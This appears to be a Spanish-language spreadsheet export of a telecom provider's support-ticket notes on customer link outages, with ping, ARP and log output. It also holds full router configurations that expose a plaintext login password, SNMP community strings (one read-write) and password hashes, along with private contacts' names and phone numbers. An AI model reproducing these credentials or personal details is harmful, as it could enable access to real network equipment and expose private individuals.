PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ VAZQUEZ EDGAR JESUS &lt;EHVAZQUE@UNINET.COM.MX&gt;; YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; RODRIGUEZ HERNANDEZ LAURA LILIA &lt;RHERNANL@UNINET.COM.MX&gt;; JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; HERNANDEZ ESCALONA JUAN JOSE &lt;JHESCALO@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100042T ### ::: TICKET CNOC IMBBL003936 ### ::: LINK FLAPPING
ESTIMADO CLIENTE SE REALIZO DIAGNÓSTICO DE ENLACE EL CUAL SE OBSERVA OPERATIVO EN ESTE MOMENTO ES NECESARIO VALIDAR ALGUNA PRUEBA DONDE USTED PERCIBE LA CAIDA DEL SERVICIO YA QUE NO SE OBSERVA ALGUNA ALARMA SOBRE EL SERVICIO.
&lt;HUEHGTHUN1T1A07A02EIM1&gt;PIN -C 1000 -S 1500 -B -M 50  -VPN INTERNET_GT_DEPTAL 10.105.6.43
  PING 10.105.6.43: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.105.6.43 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/20 MS
&lt;HUEHGTHUN1T1A07A02EIM1&gt;
A LA ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>F4572055</t>
  </si>
  <si>
    <t>SE LLAMA A ENCARGADO 78871361 PERO NO CONTESTA, SE NECESITA VALIDAR PRUEBAS DE N1, ID: 1001347350, 1001351123.</t>
  </si>
  <si>
    <t>SE OBSERVA QUE ENLACE LEVANTO, SE SOLICITA A CLIENTE VALIDAR ENLACE, NO ENCUENTRA CONTACTO DEL PUNTO REMOTO.
ZAPOTE#PING VRF GESTION_CPES 10.13.64.67
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 10.13.64.67, TIMEOUT IS 2 SECONDS:
.!!!!
SUCCESS RATE IS 80 PERCENT (4/5), ROUND-TRIP MIN/AVG/MAX = 4/5/8 MS
ZAPOTE#PING VRF BARISTA  10.235.41.102
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 10.235.41.102, TIMEOUT IS 2 SECONDS:
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/3/4 MS
ZAPOTE#</t>
  </si>
  <si>
    <t>SE LLAMA A WALTER ANIBAL REYES 45787911 SE LE INFORMA QUE ENCARGADO NO CONTESTA, ESTA BUSCANDO DATOS DEL SITIO REMOTO...</t>
  </si>
  <si>
    <t>F4572057</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. PABLO HERNANDEZ 46333169  ACTUALMENTE EN LLAMADA REALIZANDO PRUEBAS INFORMA QUE LE APLICARON REINICIO AL EQUIPO Y YA LE LLEGAN A LA IP 192.168.246.1, SOLICITA VALIDAR A LAS 11 AM.
CC_BODEGA_FARMACEUTICA_GT_V_HERMOSA#PING 192.168.246.1 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 192.168.246.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 192.168.246.1
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/1/4 MS
CC_BODEGA_FARMACEUTICA_GT_V_HERMOSA#
CC_BODEGA_FARMACEUTICA_GT_V_HERMOSA#
CC_BODEGA_FARMACEUTICA_GT_V_HERMOSA#
CC_BODEGA_FARMACEUTICA_GT_V_HERMOSA#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.78.64.65             4   DC99.147A.A0C9  ARPA   GIGABITETHERNET1
INTERNET  10.78.64.70             -   B07D.47E6.29F5  ARPA   GIGABITETHERNET1
INTERNET  192.168.246.1           -   B07D.47E6.29F0  ARPA   VLAN1
INTERNET  192.168.246.2           5   F8BC.12A8.7DE1  ARPA   VLAN1
INTERNET  192.168.246.3           0   6400.6A68.E956  ARPA   VLAN1
INTERNET  192.168.246.4           0   001E.C97A.E794  ARPA   VLAN1
INTERNET  192.168.246.5           0   0021.701E.ABB3  ARPA   VLAN1
INTERNET  192.168.246.6           1   F8BC.129F.815F  ARPA   VLAN1
INTERNET  192.168.246.51         24   2CC8.1B3F.2C40  ARPA   VLAN1
INTERNET  192.168.246.80         24   001C.2A02.960B  ARPA   VLAN1
INTERNET  192.168.246.99          0   9C14.6375.6D56  ARPA   VLAN1
INTERNET  192.168.246.100         1   5838.7945.8FDF  ARPA   VLAN1</t>
  </si>
  <si>
    <t>F4572061</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA MAIL AL CLIENTE NOTIFICANDO LA ALARMA
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: SÁBADO, 21 DE MAYO DE 2022 10:4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4679
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM46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2061
ID: 47503730T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM4679
UBICADO EN: CAJERO 4679_5 CALLE 3 AVENIDA ZONA 1 BARBERENA SANTA ROSA_FARMACIAS CRUZ VERDE BARBERENA 2
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4572069</t>
  </si>
  <si>
    <t>SE HABLÓ CON YANIRA LANCERIO/PR 51228025 ME BRINDA EL TEL DEL ENCARGADO; JORGE DÍAZ/PR 45565402, SE TIENE EN LÍNEA A ÉSTE, INDICA QUE VE OK SERVICIO DESDE LAS 08:00AM, SE HABLARÁ CON GESTIÓN N1 PARA VER COMPORTAMIENTO DEL SERVICIO.
ASEGURA QUE EQUIPO ESTÁ COMO SOBRE CALENTADO, Y NO ESTÁ CERCA DE LA COCINA.</t>
  </si>
  <si>
    <t>F4572101</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 1 MINUTO)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IMSA_GT_BODEGA_MYM UPTIME IS 1 MINUTE
UPTIME FOR THIS CONTROL PROCESSOR IS 3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7V
1 VIRTUAL ETHERNET INTERFACE
6 GIGABIT ETHERNET INTERFACES
32768K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
4194304K BYTES OF PHYSICAL MEMORY.
2863103K BYTES OF FLASH MEMORY AT BOOTFLASH:.
0K BYTES OF WEBUI ODM FILES AT WEBUI:.
CONFIGURATION REGISTER IS 0X2102
CC_IMSA_GT_BODEGA_MYM#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 7933 BYTES
!
! LAST CONFIGURATION CHANGE AT 05:06:11 UTC SAT MAY 21 2022
!
VERSION 16.10
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
SERVICE CALL-HOME
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME CC_IMSA_GT_BODEGA_MYM
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 9 $9$VCDUSZMC7CPJYE$P5SNB.BUOTCMV1ENJ6LEEXBFOUI0CITPL7MERYFI3TU
ENABLE PASSWORD @T7AC43D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093440097
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-1093440097
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-1093440097
!
CRYPTO PKI TRUSTPOINT SLA-TRUSTPOINT
 ENROLLMENT PKCS12
 REVOCATION-CHECK CRL
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-1093440097
 CERTIFICATE SELF-SIGNED 01
  30820330 30820218 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 31303933 34343030 3937301E 170D3230 31323032 30303238
  33395A17 0D333030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D31 30393334
  34303039 37308201 22300D06 092A8648 86F70D01 01010500 0382010F 00308201
  0A028201 0100AB0A 672A322C 5565A750 25359238 8D0F1EDF 80431A21 4F407D3A
  B9205CF8 D18B9829 4B6B6A44 D81CFAB5 499C4B4A 7D97FA71 B8549F8D 3B5EDA06
  84270C94 4CCDE877 8FE9263B A3B7F9AB FDBA6EE2 6EDD60F8 F13690D4 C3C19170
  7E933A03 D53F5488 57E9CD0C 4C7245B3 9EAC3AEE 2B53C712 A48A4A30 BE3837E2
  A2F1DB6E 083B68FF C8F57C79 EEA1585C 3EF2667A AAAFABD3 E8A7E4E7 AB98A3CB
  8849DAE3 3CD4C867 02E1FEC2 9DC5514F E81AEAB5 9EBEBDD2 F5930518 61085479
  A97A80A6 F3D379E3 18612782 EDF0E9DC A7F4E804 A9DC5236 BB72BBAE 6EE88DD4
  B1216636 67D7E853 BF2C02FF 4752EB53 055F2474 CA9010E4 67F3AE4C 02014DC1
  43B7C15F 60030203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF
  301F0603 551D2304 18301680 14CD7AC2 B517005D 2C1FB240 D70C4721 974A7E38
  6A301D06 03551D0E 04160414 CD7AC2B5 17005D2C 1FB240D7 0C472197 4A7E386A
  300D0609 2A864886 F70D0101 05050003 82010100 8564220F AD0290DE 1452E193
  EE16591B FC844E97 AAF885E0 017C6CEC E6A67257 BC6210B6 2F789FA9 BA29E665
  564D9A84 CB450244 CA677D2E 893628AA 45C5A5E1 15F3376A A7EA56EC 43F3E8B6
  F994E917 E186E10B B22961A2 17D8FC12 05B98A0B 23796E6F 7DBDD81B 917573CD
  B745BF83 3D56DE5A 6BA2F1B4 459AD1A4 0B40AC9F 445822E8 8E0F32D4 049C237B
  CC246B06 40BEB09C 0457695C 2F7C5208 C83B5BB7 A76C6CF3 515A6274 1E7C3C3C
  8D0181D2 6AC2F191 DFF1D776 23509C9B 068DBD79 EBF85DB3 289F0CB3 C204AB8B
  3D08BA5A E05B49A9 3E37709F 048836DD 903EAD85 FCA8FBDD 83150930 7753B18D
  CE84D7C3 3E1345B6 F38A8FA3 01870A9E 4DAC249F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7V
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
USERNAME GESTIONIP PASSWORD 0 NE7W0RK$
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
!
POLICY-MAP RATE
 CLASS CLASS-DEFAULT
  POLICE CIR 15360000 BC 2880000 BE 5760000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.115.67 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN PRINCIPAL/_/54700046T/_/
 BANDWIDTH 15360
 IP ADDRESS 10.72.176.220 255.255.255.0
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 SHUTDOWN
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1/1
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1/2
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1/3
 DESCRIPTION LAN DEL CLIENTE
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 15360
 IP ADDRESS 10.13.29.1 255.255.255.0
 SERVICE-POLICY INPUT RATE
 SERVICE-POLICY OUTPUT RATE
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
NO IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.72.176.217
!
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY INGENIORO RO
SNMP-SERVER COMMUNITY INGENIORW RW
SNMP-SERVER COMMUNITY MON000547D RO
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION BODEGA M&amp;M - AVENIDA Y 41 CALLE RECINTO PORTUARIO A LA PAR DE EXPOGRANEL PUERTO
!
!
CONTROL-PLANE
!
BANNER LOGIN ^C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STOPBITS 1
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
!
!
!
!
!
END
CC_IMSA_GT_BODEGA_MYM#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 50 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 50 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 53 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
OL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*MAY 21 05:06:05.499: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LSMPI0, CHANGED STATE TO UP
*MAY 21 05:06:05.500: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EOBC0, CHANGED STATE TO UP
*MAY 21 05:06:05.500: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LIIN0, CHANGED STATE TO UP
*MAY 21 05:06:06.566: %ONEP_BASE-6-SS_ENABLED: ONEP: SERVICE SET BASE WAS ENABLED BY DEFAULT
*MAY 21 05:06:08.765: %CRYPTO_ENGINE-5-KEY_ADDITION: A KEY NAMED TP-SELF-SIGNED-1093440097 HAS BEEN GENERATED OR IMPORTED BY CRYPTO CONFIG
*MAY 21 05:06:08.783: %SYS-2-PRIVCFG_DECRYPT: SUCCESSFULLY APPLY THE PRIVATE CONFIG FILE
*MAY 21 05:06:08.862: %AAAA-4-CLI_DEPRECATED: WARNING: COMMAND HAS BEEN ADDED TO THE CONFIGURATION USING A TYPE 0 PASSWORD. HOWEVER, TYPE 0 PASSWORDS WILL SOON BE DEPRECATED. MIGRATE TO A SUPPORTED PASSWORD TYPE
*MAY 21 05:06:08.986: %AAA-5-USER_RESET: USER GESTIONIP FAILED ATTEMPTS RESET BY VTY0
*MAY 21 05:06:08.987: %AAAA-4-CLI_DEPRECATED: WARNING: COMMAND HAS BEEN ADDED TO THE CONFIGURATION USING A TYPE 0 PASSWORD. HOWEVER, TYPE 0 PASSWORDS WILL SOON BE DEPRECATED. MIGRATE TO A SUPPORTED PASSWORD TYPE
*MAY 21 05:06:09.021: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 21 05:06:09.231: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 21 05:06:09.250: %IOSXE_OIR-6-REMSPA: SPA REMOVED FROM SUBSLOT 0/0, INTERFACES DISABLED
*MAY 21 05:06:09.251: %IOSXE_OIR-6-REMSPA: SPA REMOVED FROM SUBSLOT 0/1, INTERFACES DISABLED
*MAY 21 05:06:09.264: %SPA_OIR-6-OFFLINECARD: SPA (C1111-2X1GE) OFFLINE IN SUBSLOT 0/0
*MAY 21 05:06:09.275: %SPA_OIR-6-OFFLINECARD: SPA (C1111-ES-4) OFFLINE IN SUBSLOT 0/1
*MAY 21 05:06:09.321: %IOSXE_OIR-6-INSCARD: CARD (FP) INSERTED IN SLOT F0
*MAY 21 05:06:09.321: %IOSXE_OIR-6-ONLINECARD: CARD (FP) ONLINE IN SLOT F0
*MAY 21 05:06:09.333: %IOSXE_OIR-6-INSCARD: CARD (CC) INSERTED IN SLOT 0
*MAY 21 05:06:09.333: %IOSXE_OIR-6-ONLINECARD: CARD (CC) ONLINE IN SLOT 0
*MAY 21 05:06:09.421: %IOSXE_OIR-6-INSSPA: SPA INSERTED IN SUBSLOT 0/0
*MAY 21 05:06:09.424: %IOSXE_OIR-6-INSSPA: SPA INSERTED IN SUBSLOT 0/1
*MAY 21 05:06:09.563: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE [GIBRALTAR], ISR SOFTWARE (ARMV8EL_LINUX_IOSD-UNIVERSALK9_IAS-M), VERSION 16.10.1B, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2018 BY CISCO SYSTEMS, INC.
COMPILED WED 12-DEC-18 01:49 BY MCPRE
*MAY 21 05:06:09.598: %SSH-5-ENABLED: SSH 1.99 HAS BEEN ENABLED
*MAY 21 05:06:10.469: %CRYPTO_ENGINE-5-KEY_ADDITION: A KEY NAMED TP-SELF-SIGNED-1093440097.SERVER HAS BEEN GENERATED OR IMPORTED BY CRYPTO-ENGINE
*MAY 21 05:06:11.345: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_IMSA_GT_BODEGA_MYM IS UNDERGOING A COLD START
*MAY 21 05:06:14.180: %SPA_OIR-6-ONLINECARD: SPA (C1111-2X1GE) ONLINE IN SUBSLOT 0/0
*MAY 21 05:06:14.929: %SPA_OIR-6-ONLINECARD: SPA (C1111-ES-4) ONLINE IN SUBSLOT 0/1
*MAY 21 05:06:15.856: %PNP-6-PNP_DISCOVERY_STOPPED: PNP DISCOVERY STOPPED (STARTUP CONFIG PRESENT)
*MAY 21 05:06:16.104: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 21 05:06:16.920: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/3, CHANGED STATE TO DOWN
*MAY 21 05:06:20.702: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 21 05:06:21.700: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 21 05:06:24.468: %CRYPTO_ENGINE-5-KEY_ADDITION: A KEY NAMED CISCO_IDEVID_SUDI HAS BEEN GENERATED OR IMPORTED BY PKI-SUDI
*MAY 21 05:06:24.493: %PKI-2-NON_AUTHORITATIVE_CLOCK: PKI FUNCTIONS CAN NOT BE INITIALIZED UNTIL AN AUTHORITATIVE TIME SOURCE, LIKE NTP, CAN BE OBTAINED.
*MAY 21 05:06:40.565: %CALL_HOME-6-CALL_HOME_ENABLED: CALL-HOME IS ENABLED BY SMART AGENT FOR LICENSING.
*MAY 21 05:06:40.567: %SMART_LIC-5-COMM_RESTORED: COMMUNICATIONS WITH THE CISCO SMART SOFTWARE MANAGER OR SATELLITE RESTORED
*MAY 21 05:06:57.968: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 10.72.176.217] [LOCALPORT: 23] AT 05:06:57 UTC SAT MAY 21 2022
CC_IMSA_GT_BODEGA_MYM#
SHOW CLOCK
*05:07:21.105 UTC SAT MAY 21 2022
CC_IMSA_GT_BODEGA_MYM#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.13.29.1              -   2416.9D40.8674  ARPA   VLAN1
INTERNET  10.72.176.217           1   DC99.147A.A231  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.72.176.220           -   2416.9D40.8600  ARPA   GIGABITETHERNET0/0/0
CC_IMSA_GT_BODEGA_MYM#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN PRINCIPAL/_/54700046T/_/
GI0/0/1                        ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
GI0/1/0                        ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
GI0/1/1                        ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
GI0/1/2                        ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
GI0/1/3                        DOWN           DOWN     LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             DOWN     LAN DEL CLIENTE
CC_IMSA_GT_BODEGA_MYM#
SHOW IP INT BRIEF
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.72.176.220   YES NVRAM  UP                    UP
GIGABITETHERNET0/0/1   UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/1/0   UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/1/1   UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/1/2   UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/1/3   UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5              10.212.115.67   YES NVRAM  UP                    UP
VLAN1                  10.13.29.1      YES NVRAM  UP                    DOWN
CC_IMSA_GT_BODEGA_MYM#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INGENIOMAGDALENA 10.72.176.220
  PING 10.72.176.220: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.176.220 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/4 MS
RUTA IP:
PE: 10.179.28.27
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INGENIOMAGDALENA 10.72.176.220
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INGENIOMAGDALENA
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.72.176.216/29  DIRECT  0    0             D   10.72.176.217   VLANIF492</t>
  </si>
  <si>
    <t>F4572114</t>
  </si>
  <si>
    <t>-* SE HABLA CON OMAR MARTINEZ (CLIENTE) INFORMA QUE HICIERON UNAS ACTUALIZACIONES Y EL SERVICIO NO LEVANTO, SE LE CONFIRMA QUE SE VE TODO OK, POR LO QUE VALIDARA DE FORMA INTERNA Y RESPONDERÁ AL CORREO CON LA VALIDACION -*
-*</t>
  </si>
  <si>
    <t>F4572204</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SWE PORCEDE CON CIERRE POR PROBLEMA DE ENERGIA COMENRCIAL EN EL CLEINTE .
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 25 MINUTO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PRONE_GT_MONTE_CARLOS_FRAIJANES UPTIME IS 25 MINUTES
UPTIME FOR THIS CONTROL PROCESSOR IS 27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KE
1 VIRTUAL ETHERNET INTERFACE
6 GIGABIT ETHERNET INTERFACES
32768K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
4194304K BYTES OF PHYSICAL MEMORY.
2863103K BYTES OF FLASH MEMORY AT BOOTFLASH:.
0K BYTES OF WEBUI ODM FILES AT WEBUI:.
CONFIGURATION REGISTER IS 0X2102
CC_PRONE_GT_MONTE_CARLOS_FRAIJANES#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 6959 BYTES
!
! LAST CONFIGURATION CHANGE AT 08:48:05 UTC SAT MAY 21 2022
!
VERSION 16.10
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
SERVICE CALL-HOME
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME CC_PRONE_GT_MONTE_CARLOS_FRAIJANES
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
SECURITY AUTHENTICATION FAILURE RATE 3 LOG
ENABLE SECRET 9 $9$YDF43DEP3A.B5U$WAJEZFQRXDJ0NHZKWN1OFFHCDCN/NJG5LQT8FR4BMXU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5 WITHIN 60
LOGIN QUIET-MODE ACCESS-CLASS ACCESO
LOGIN ON-SUCCESS LOG
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
CRYPTO PKI TRUSTPOINT SLA-TRUSTPOINT
 ENROLLMENT PKCS12
 REVOCATION-CHECK CRL
!
!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KE
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
USERNAME GESTIONIP PRIVILEGE 7 SECRET 9 $9$GKRF333WGXOOC.$OKLMIZEZAZYMACPT6UXAFHR28OK0ATEMWACKVJBPYVS
USERNAME CERVECERIA PRIVILEGE 15 SECRET 9 $9$QSPAQ1HYXWPH8U$VSF238NXRM6TQQLD3NXGV8HE7OXDA79ILGXFAVE15S.
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
!
